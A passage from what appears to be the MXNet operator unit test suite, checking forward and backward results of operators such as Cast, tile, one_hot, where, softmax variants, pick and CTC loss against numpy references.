out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
